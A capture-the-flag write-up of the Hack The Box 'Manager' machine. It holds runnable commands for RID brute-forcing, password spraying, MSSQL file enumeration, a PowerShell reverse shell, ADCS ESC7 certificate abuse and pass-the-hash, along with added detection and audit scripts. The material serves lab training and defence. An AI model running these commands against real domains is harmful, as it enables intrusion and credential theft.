# HTB - Manager

- Target IP: 10.129.8.181
- Domain: manager.htb
- DC Hostname: DC01.manager.htb
- OS: Windows Server 2019 (Domain Controller)
- Difficulty: Medium
- Author: [g1nt0n1c]
## 1. Phase 1: Reconnaissance & Information Gathering

### 1.1 TCP Port Discovery

```bash
# Fast full-port sweep to identify all open ports before deeper scanning
nmap -p- --min-rate 10000 10.10.11.236
# Targeted version + script scan on identified ports
nmap -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV 10.10.11.236
```

### Port Analysis & Attack Surface

| Port | Service | Notes |
|---|---|---|
| 80/tcp | IIS 10.0 | Corporate website — could host files or expose the webroot |
| 88/tcp | Kerberos | Domain Controller confirmed |
| 389/tcp | LDAP | Domain: manager.htb, DC: dc01.manager.htb |
| 445/tcp | SMB | Null Auth enabled per nxc probe — worth enumerating |
| 1433/tcp | MSSQL | High value — SQL Server 15.00.2000.00; separate attack surface |
| 5985/tcp | WinRM | Remote shell entry point if valid credentials found |

```text
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Manager
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
389/tcp  open  ldap          Microsoft Windows AD LDAP (Domain: manager.htb)
| ssl-cert: Subject: commonName=dc01.manager.htb
1433/tcp open  ms-sql-s      Microsoft SQL Server 15.00.2000.00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0
Service Info: Host: DC01; OS: Windows
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
```
Key observations:

- SMB signing is required — relay attacks blocked.
- Port 1433 (MSSQL) is rare on a DC — a separate, high-value entry point.
- `Null Auth: True` on SMB means we can attempt unauthenticated enumeration.
### 1.2 Local Host Resolution

```bash
# Add DC hostname, FQDN, and short domain — all needed for various tools
echo "10.129.8.181 DC01.manager.htb manager.htb DC01" | sudo tee -a /etc/hosts
```

## 2. Phase 2: SMB Enumeration & User Discovery
### 2.1 Probe SMB Authentication

```bash
# Quick SMB probe — confirms domain, build, and null auth status
nxc smb 10.129.8.181
# SMB DC01 [*] Windows 10 / Server 2019 Build 17763 (domain:manager.htb) (signing:True) (Null Auth:True)
```

### 2.2 Enumerate Shares via Null and Guest Sessions
```bash
# Null session — anonymous bind
nxc smb 10.129.8.181 -u '' -p '' --shares
# [-] STATUS_ACCESS_DENIED
# Guest session — unauthenticated user account
nxc smb 10.129.8.181 -u 'guest' -p '' --shares
# IPC$ READ Remote IPC (only readable share)
```

No useful shares via guest. Move on to user enumeration.
### 2.3 Enumerate Domain Users

Two methods — `--users` queries the directory API; `--rid-brute` brute-forces Relative Identifiers over SMB and works even without directory read permissions.

```bash
# Method 1: directory query (requires more permissions — empty here)
nxc smb 10.129.8.181 -u 'guest' -p '' --users
# Method 2: RID brute-force — walks RID 500–2000+ and resolves each SID to a name
nxc smb 10.129.8.181 -u 'guest' -p '' --rid-brute
```

Key finding — custom users (RID > 1000):
```text
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
```
RIDs above 1000 are custom-created accounts; below 1000 are built-in (Administrator = 500, Guest = 501).
### 2.4 Build Username List and Password Spray

Save the discovered users, then spray `username:username` — a common weak-password pattern for service and operator accounts.

```bash
# Save usernames to file
cat > usernames.txt << EOF
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator
EOF
# Lowercase all names (AD is case-insensitive, but tools may not be)
cat usernames.txt | tr '[:upper:]' '[:lower:]' > lower-usernames.txt
# Spray: --no-bruteforce pairs row 1 of userlist with row 1 of passlist (no cross-product)
# --continue-on-success keeps testing even after a hit
nxc smb 10.129.8.181 -u lower-usernames.txt -p lower-usernames.txt --no-bruteforce --continue-on-success
# [+] manager.htb\operator:operator
```

## 3. Phase 3: MSSQL Enumeration & File Disclosure
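The spray above has a distinctive shape from the defender's side: one source, one guess per account, many accounts in a short window. The script below is an added example (not part of this writeup or of nxc) that detects that fan-out in authentication logs. The log format is constructed for the example; map real sources (DC logon events, for instance) onto the same `src` / `user` / `status` fields. It also reports any account that succeeded inside the spray, since that is the hit to act on first.

```python
"""Detect a password-spray pattern in authentication logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source tries each discovered user once (the
# username:username spray from the writeup), while a workstation user
# simply mistypes their own password a couple of times.
SAMPLE_LOG = """\
2023-07-27T10:00:01 src=10.10.14.5 user=zhong status=FAIL
2023-07-27T10:00:01 src=10.10.14.5 user=cheng status=FAIL
2023-07-27T10:00:02 src=10.10.14.5 user=ryan status=FAIL
2023-07-27T10:00:02 src=10.10.14.5 user=raven status=FAIL
2023-07-27T10:00:03 src=10.10.14.5 user=jinwoo status=FAIL
2023-07-27T10:00:03 src=10.10.14.5 user=chinhae status=FAIL
2023-07-27T10:00:04 src=10.10.14.5 user=operator status=SUCCESS
2023-07-27T10:05:00 src=10.129.8.50 user=ryan status=FAIL
2023-07-27T10:05:10 src=10.129.8.50 user=ryan status=FAIL
2023-07-27T10:05:30 src=10.129.8.50 user=ryan status=SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) status=(?P<status>FAIL|SUCCESS)$"
)


def parse_events(text):
    """Turn log text into (timestamp, src, user, status) tuples; junk lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["status"]))
    return events


def detect_spray(text, window=timedelta(minutes=5), min_users=5):
    """Return {src: {"users": [...], "successes": [...]}} for every source that
    touched at least `min_users` distinct accounts within `window`.

    The signal is distinct accounts per source per time window. Repeated
    failures for a single account from one host (a forgotten password) never
    trip it, so the threshold can be low.
    """
    by_src = defaultdict(list)
    for ts, src, user, status in sorted(parse_events(text)):
        by_src[src].append((ts, user, status))

    findings = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it fits inside `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if len({u for _, u, _ in evs[start:end + 1]}) >= min_users:
                findings[src] = {
                    "users": sorted({u for _, u, _ in evs}),
                    "successes": sorted({u for _, u, s in evs if s == "SUCCESS"}),
                }
                break
    return findings


if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_LOG).items():
        print(f"spray from {src}: {len(info['users'])} accounts, "
              f"successes={info['successes'] or 'none'}")
```

Passwords never appear in logs, so the `username:username` choice itself is invisible; the fan-out across accounts is what a detection has to key on. Tune `window` and `min_users` to the environment, and treat any `successes` entry as a compromised account rather than a noisy alert.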
### 3.1 Validate Credentials Against MSSQL

```bash
# Confirm operator works on the SQL service too
nxc mssql manager.htb -u operator -p operator
# [+] manager.htb\operator:operator
```

### 3.2 Connect to MSSQL

```bash
# -windows-auth: authenticate using Windows/Kerberos, not SQL Server auth
mssqlclient.py -windows-auth manager.htb/operator:operator@manager.htb
```

### 3.3 Attempt Command Execution
```sql
-- Try to run OS commands via the built-in stored procedure
xp_cmdshell whoami
-- ERROR: EXECUTE permission was denied on 'xp_cmdshell'
-- Try to enable it — also blocked
enable_xp_cmdshell
-- ERROR: You do not have permission to run the RECONFIGURE statement.
```

`xp_cmdshell` is disabled and we cannot re-enable it. Fall back to filesystem enumeration.
### 3.4 Enumerate the Filesystem via xp_dirtree

`xp_dirtree` lists directories and files without executing commands. It runs in the SQL Server service context and can read any path the service account can access.

```sql
-- List the C:\ root to identify interesting directories
xp_dirtree C:\
-- inetpub 1 0 <= IIS web root
-- Enumerate the IIS web root
xp_dirtree C:\inetpub\wwwroot
-- about.html 1 1
-- index.html 1 1
-- web.config 1 1
-- website-backup-27-07-23-old.zip 1 1 <= INTERESTING
```

`C:\inetpub\wwwroot` is the IIS web root — any file listed there is directly downloadable via HTTP.
### 3.5 Download the Backup Archive

Since the file is in the web root, download it directly via HTTP:

```bash
# Download the backup from the web server
wget http://10.129.8.181/website-backup-27-07-23-old.zip
unzip website-backup-27-07-23-old.zip -d backup/
```

### 3.6 Search for Credentials in the Backup
```bash
# Show all files including hidden ones (-a flag)
tree -a backup/
# ├── .old-conf.xml ← hidden config file
# Recursively search for the word "password" (case-insensitive)
grep -ri password backup/
# .old-conf.xml: <password>R4v3nBe5tD3veloP3r!123</password>
```

```xml
<!-- .old-conf.xml -->
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
```

## 4. Phase 4: Initial Access (WinRM as raven)
### 4.1 Validate Credentials

```bash
nxc winrm 10.129.8.181 -u raven -p 'R4v3nBe5tD3veloP3r!123'
# [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)
```

### 4.2 Open Reverse Shell

Generate a Base64-encoded PowerShell reverse shell at revshells.com and execute it via WinRM.

```bash
# Start listener
rlwrap nc -lvnp 4444
# Execute reverse shell payload
nxc winrm 10.129.8.181 -u raven -p 'R4v3nBe5tD3veloP3r!123' -X "powershell -e JABjAGw..."
# whoami
# manager\raven
```

## 5. Phase 5: Privilege Escalation (ADCS ESC7 → Domain Admin)
### 5.1 Enumerate Active Directory Certificate Services

certipy enumerates all Certificate Authorities and templates, flagging known misconfigurations (ESC1–ESC11).

```bash
# -vulnerable: only show exploitable findings | -stdout: print to terminal
certipy find -dc-ip 10.129.8.181 -ns 10.129.8.181 \
  -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' \
  -vulnerable -stdout
```

Key finding:

```text
CA Name : manager-DC01-CA
Permissions
  ManageCA : MANAGER.HTB\Raven    <= raven can manage the CA itself
[!] Vulnerabilities
  ESC7 : User has dangerous permissions.
```

Raven has ManageCA on the root CA — this is ESC7.
### 5.2 Exploit ESC7 — Self-Approval Attack

ESC7 is a four-step attack: escalate your own CA permissions → request a restricted cert → approve it yourself → authenticate as Administrator.

#### Step 1 — Grant raven the ManageCertificates right (Officer role)

ManageCA allows modifying CA settings, including adding Officers (Certificate Managers who can approve pending requests).

```bash
certipy ca -ca manager-DC01-CA \
  -add-officer raven \
  -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' \
  -dc-ip 10.129.8.181
# [*] Successfully added officer 'Raven' on 'manager-DC01-CA'
```

#### Step 2 — Request a SubCA certificate for Administrator

The SubCA template is restricted, so raven cannot enroll directly. The CA accepts the request but holds it in the Pending state. We save the private key for later.

```bash
certipy req -ca manager-DC01-CA \
  -target dc01.manager.htb \
  -template SubCA \
  -upn administrator@manager.htb \
  -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' \
  -dc-ip 10.129.8.181
# [*] Request ID is 24
# [-] CERTSRV_E_TEMPLATE_DENIED (expected — request is pending)
# [*] Saving private key to '24.key'
```

#### Step 3 — Approve the pending request using Officer rights

```bash
certipy ca -ca manager-DC01-CA \
  -issue-request 24 \
  -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' \
  -dc-ip 10.129.8.181
# [*] Successfully issued certificate request ID 24
```

#### Step 4 — Retrieve the issued certificate

```bash
certipy req -ca manager-DC01-CA \
  -target dc01.manager.htb \
  -retrieve 24 \
  -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' \
  -dc-ip 10.129.8.181
# [*] Got certificate with UPN 'administrator@manager.htb'
# [*] Saving certificate and private key to 'administrator.pfx'
```

### 5.3 Authenticate as Administrator and Retrieve NTLM Hash
In AD, a certificate can be exchanged for a Kerberos TGT via PKINIT. Certipy performs this exchange and additionally extracts the NTLM hash from the TGT's PAC.

```bash
certipy auth -pfx administrator.pfx -dc-ip 10.129.8.181
# [*] Got TGT
# [*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
```

### 5.4 Pass the Hash — Validate Domain Admin Access

```bash
# Use the NT hash directly — no password needed
nxc smb 10.129.8.181 -u administrator -H ae5064c2f62317332c88629e025924ef
# [+] manager.htb\administrator:ae5064c2f62317332c88629e025924ef (Pwn3d!)
```

## Deep Dive: RID Brute-Force User Enumeration
Every security principal in Windows has a Security Identifier (SID) in the format `S-1-5-21-<domain>-<RID>`. The RID (Relative Identifier) is a sequential number: 500 = Administrator, 501 = Guest, 1000+ = custom accounts. By requesting the name that maps to each RID over SMB's `lsarpc` named pipe, we can enumerate all user and group accounts without any directory read permissions — guest-level SMB access is sufficient.
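To make the SID structure and the RID split concrete, here is an added example (not part of the writeup or of nxc) that parses domain SIDs into their domain and RID components, classifies RIDs as built-in or custom, and reads the `RID: DOMAIN\Name (SidType)` rows that section 2.3 shows so a reviewer can pull out the custom user accounts that need an audit. The sample output is constructed from the writeup's table plus a few extra rows (groups, and the built-in RIDs the deep dive names); the well-known RIDs beyond 500 and 501 are standard AD values.

```python
"""Parse Windows SIDs and RID-brute output; classify built-in vs custom principals (added example)."""
import re
from typing import List, NamedTuple

# 500 and 501 are the ones named in the writeup; 502, 512 and 513 are the
# standard RIDs for krbtgt, Domain Admins and Domain Users.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt",
                   512: "Domain Admins", 513: "Domain Users"}

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")
RID_BRUTE_RE = re.compile(r"^\s*(\d+):\s+([^\\]+)\\(.+?)\s+\((\w+)\)\s*$")


class Sid(NamedTuple):
    domain_sid: str  # S-1-5-21-<a>-<b>-<c>: identical for every principal in the domain
    rid: int         # relative identifier: the part that --rid-brute walks


class RidEntry(NamedTuple):
    rid: int
    domain: str
    name: str
    sid_type: str    # SidTypeUser, SidTypeGroup, SidTypeAlias, ...


def parse_sid(sid: str) -> Sid:
    """Split a domain SID into its domain prefix and RID; anything else is rejected."""
    m = DOMAIN_SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid!r}")
    return Sid(m.group(1), int(m.group(2)))


def classify_rid(rid: int) -> str:
    """Built-in principals sit below 1000; everything created by admins is 1000+."""
    if rid in WELL_KNOWN_RIDS:
        return f"built-in ({WELL_KNOWN_RIDS[rid]})"
    return "built-in" if rid < 1000 else "custom"


def parse_rid_brute(lines) -> List[RidEntry]:
    """Parse `RID: DOMAIN\\Name (SidType)` rows; non-matching lines are ignored."""
    entries = []
    for line in lines:
        m = RID_BRUTE_RE.match(line)
        if m:
            entries.append(RidEntry(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return entries


def custom_users(lines) -> List[str]:
    """Names of user accounts (not groups) with RID >= 1000: the ones worth reviewing."""
    return [e.name for e in parse_rid_brute(lines)
            if e.sid_type == "SidTypeUser" and classify_rid(e.rid) == "custom"]


# Constructed sample modelled on the writeup's --rid-brute output
SAMPLE_OUTPUT = """\
500: MANAGER\\Administrator (SidTypeUser)
501: MANAGER\\Guest (SidTypeUser)
512: MANAGER\\Domain Admins (SidTypeGroup)
1113: MANAGER\\Zhong (SidTypeUser)
1114: MANAGER\\Cheng (SidTypeUser)
1115: MANAGER\\Ryan (SidTypeUser)
1116: MANAGER\\Raven (SidTypeUser)
1117: MANAGER\\JinWoo (SidTypeUser)
1118: MANAGER\\ChinHae (SidTypeUser)
1119: MANAGER\\Operator (SidTypeUser)
1120: MANAGER\\Developers (SidTypeGroup)
"""

if __name__ == "__main__":
    for e in parse_rid_brute(SAMPLE_OUTPUT.splitlines()):
        print(f"{e.rid:>5} {e.name:<20} {e.sid_type:<13} {classify_rid(e.rid)}")
```

Because the RID is sequential, a gap-free walk from 500 upward enumerates every principal; the defensive counterpart is that the same walk is only possible when anonymous or guest SMB sessions are allowed to bind to `lsarpc`, which the output of section 2.1 (`Null Auth:True`) is the first sign of.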
## Deep Dive: MSSQL xp_dirtree as a Recon Tool

`xp_dirtree` is a built-in MSSQL stored procedure designed for legitimate filesystem operations. It runs in the security context of the SQL Server service account, which often has broad local read access. Even when `xp_cmdshell` is locked down, `xp_dirtree` frequently remains available. It can enumerate any local path and also resolve UNC paths (`\\host\share`) — the latter can be used to coerce NTLM authentication (similar to Responder) by pointing it at a controlled host.
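From the monitoring side, the behaviour described in this deep dive is easy to spot if SQL statement auditing is on: `xp_cmdshell` calls (denied or not), attempts to switch it on through `sp_configure`, and `xp_dirtree` calls, with a UNC argument as the highest-priority case because it makes the service account authenticate outward. The following is an added example (not part of the writeup or of any SQL Server tooling) that classifies statements from a constructed `login=... statement=...` log; map a real source such as SQL Audit or Extended Events onto those two fields.

```python
"""Flag xp_cmdshell / xp_dirtree activity in SQL Server statement logs (added example)."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: the writeup's sequence (denied xp_cmdshell, an attempt to
# enable it, xp_dirtree over C:\ and the web root), one UNC lookup, and a benign query.
SAMPLE_LOG = """\
login=MANAGER\\operator statement=EXEC xp_cmdshell 'whoami'
login=MANAGER\\operator statement=EXEC sp_configure 'xp_cmdshell', 1
login=MANAGER\\operator statement=EXEC xp_dirtree 'C:\\'
login=MANAGER\\operator statement=EXEC xp_dirtree 'C:\\inetpub\\wwwroot'
login=MANAGER\\operator statement=EXEC xp_dirtree '\\\\10.10.14.5\\share'
login=MANAGER\\svc_report statement=SELECT TOP 10 * FROM dbo.Reports
"""

LINE_RE = re.compile(r"^login=(?P<login>\S+) statement=(?P<stmt>.+)$")
PROC_RE = re.compile(r"\b(xp_cmdshell|xp_dirtree)\b", re.I)
CONFIG_RE = re.compile(r"sp_configure\s+'xp_cmdshell'", re.I)
UNC_RE = re.compile(r"'\s*\\\\[^\\']+\\")   # quoted argument beginning with \\host\


def classify_statement(stmt: str) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for one statement, or None if it is not of interest."""
    if CONFIG_RE.search(stmt):
        return ("high", "attempt to enable xp_cmdshell via sp_configure")
    m = PROC_RE.search(stmt)
    if not m:
        return None
    if m.group(1).lower() == "xp_cmdshell":
        return ("high", "OS command execution via xp_cmdshell")
    if UNC_RE.search(stmt):
        # A UNC target makes the SQL service account authenticate to that host:
        # the coerced-authentication case the deep dive describes.
        return ("high", "xp_dirtree against a UNC path (outbound NTLM authentication)")
    return ("medium", "xp_dirtree local filesystem enumeration")


def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse every log line and collect the statements that classify as findings."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        verdict = classify_statement(m["stmt"])
        if verdict:
            findings.append({"login": m["login"], "severity": verdict[0],
                             "reason": verdict[1], "statement": m["stmt"]})
    return findings


def logins_by_severity(findings: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Aggregate {severity: sorted logins} so a single noisy account stands out."""
    out: Dict[str, set] = {}
    for f in findings:
        out.setdefault(f["severity"], set()).add(f["login"])
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']:<6}] {f['login']}: {f['reason']}")
```

A denied `xp_cmdshell` still shows up as a statement, so the failed attempts in section 3.3 are exactly as visible as a successful one; that is the point of alerting on the call rather than on its result.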
## Deep Dive: ADCS ESC7 — CA Permission Abuse

Most ADCS attacks (ESC1, ESC3) target misconfigured certificate templates. ESC7 is different — it targets misconfigured permissions on the Certificate Authority object itself.

The CA ACL has two dangerous rights:

- ManageCA — modify CA configuration, including adding Officers
- ManageCertificates (Officer) — approve or deny pending certificate requests

If a low-privileged user holds ManageCA, they can elevate to ManageCertificates by adding themselves as an Officer. With both rights, they can:

- Request a certificate from any template — even restricted ones like SubCA
- Self-approve the pending request
- Use the resulting certificate to authenticate as any user (including Domain Admin) via PKINIT

The certificate is then exchanged for a Kerberos TGT, from which the target's NTLM hash is extracted. This enables Pass-the-Hash without ever knowing the plaintext password.
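The audit that catches this before an attacker does is simple: list who holds ManageCA and ManageCertificates on each CA and compare against the principals that are supposed to have them. The script below is an added example (not part of the writeup or of Certipy) that reads a simplified `Right : principal[, principal]` block modelled on the "Permissions" excerpt in section 5.1 (not Certipy's exact output) and reports every non-trusted holder. It treats ManageCA as the more serious finding, because, as the deep dive explains, its holder can grant themselves ManageCertificates by adding an Officer. The trusted-principal allowlist is constructed for the example.

```python
"""Audit CA access rights for ESC7 conditions (added example)."""
import re
from typing import Dict, List, Set

# Constructed allowlist: principals expected to hold CA management rights.
TRUSTED_PRINCIPALS = {"MANAGER.HTB\\Administrators", "MANAGER.HTB\\Domain Admins",
                      "MANAGER.HTB\\Enterprise Admins"}
DANGEROUS_RIGHTS = ("manageca", "managecertificates")

RIGHT_RE = re.compile(r"^\s*(?P<right>[A-Za-z]+)\s*:\s*(?P<who>.+?)\s*$")

# Constructed sample in the same shape as the writeup's "Permissions" excerpt
SAMPLE_PERMISSIONS = """\
CA Name : manager-DC01-CA
Permissions
Owner : MANAGER.HTB\\Administrators
ManageCA : MANAGER.HTB\\Administrators, MANAGER.HTB\\Domain Admins, MANAGER.HTB\\Raven
ManageCertificates : MANAGER.HTB\\Administrators, MANAGER.HTB\\Domain Admins
Enroll : MANAGER.HTB\\Authenticated Users
"""


def parse_permissions(text: str) -> Dict[str, Set[str]]:
    """Map each right (lower-cased) under the 'Permissions' header to its holders."""
    rights: Dict[str, Set[str]] = {}
    in_block = False
    for line in text.splitlines():
        if line.strip() == "Permissions":
            in_block = True
            continue
        if not in_block:
            continue
        m = RIGHT_RE.match(line)
        if m:
            holders = {p.strip() for p in m["who"].split(",") if p.strip()}
            rights.setdefault(m["right"].lower(), set()).update(holders)
    return rights


def find_esc7(text: str, trusted: Set[str] = TRUSTED_PRINCIPALS) -> List[Dict[str, str]]:
    """List every non-trusted principal holding ManageCA or ManageCertificates.

    ManageCA alone is enough for a full ESC7 chain: its holder can add itself as
    an Officer and thereby obtain ManageCertificates, so it is reported even when
    the principal does not appear on the ManageCertificates line.
    """
    rights = parse_permissions(text)
    findings = []
    for right in DANGEROUS_RIGHTS:
        for who in sorted(rights.get(right, ())):
            if who in trusted:
                continue
            effective = ("ManageCA, and ManageCertificates via a self-added Officer role"
                         if right == "manageca"
                         else "ManageCertificates (approve pending requests)")
            findings.append({"principal": who, "right": right,
                             "effective": effective, "severity": "high"})
    return findings


def is_vulnerable(text: str) -> bool:
    """True when at least one non-trusted principal holds a CA management right."""
    return bool(find_esc7(text))


if __name__ == "__main__":
    for f in find_esc7(SAMPLE_PERMISSIONS):
        print(f"ESC7: {f['principal']} holds {f['right']} -> {f['effective']}")
```

The remediation follows directly from the findings: remove the stray ManageCA/ManageCertificates grants, and if a non-admin principal did hold ManageCA, review the CA's Officer list and any pending or recently issued requests, since the Officer role and the certificates it approved outlive the ACL fix.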
## Key Takeaways & Checklist

Things to always try:

- When nxc reports `Null Auth: True`, test both `-u ''` and `-u 'guest'` with `-p ''`
- If `--users` returns nothing, fall back to `--rid-brute`
- Password spray `username:username` (both original and lowercase)
- If MSSQL is open, connect with `mssqlclient.py` — even without `xp_cmdshell`, `xp_dirtree` gives filesystem visibility
- `C:\inetpub\wwwroot` is the IIS web root — files there are directly downloadable via HTTP
- Always use `tree -a` to reveal hidden files (dotfiles)
- Use `grep -ri password` to hunt for credentials in any downloaded archive or directory
- Run `certipy find -vulnerable` whenever you have valid domain credentials — ADCS misconfigs are common and often lead directly to DA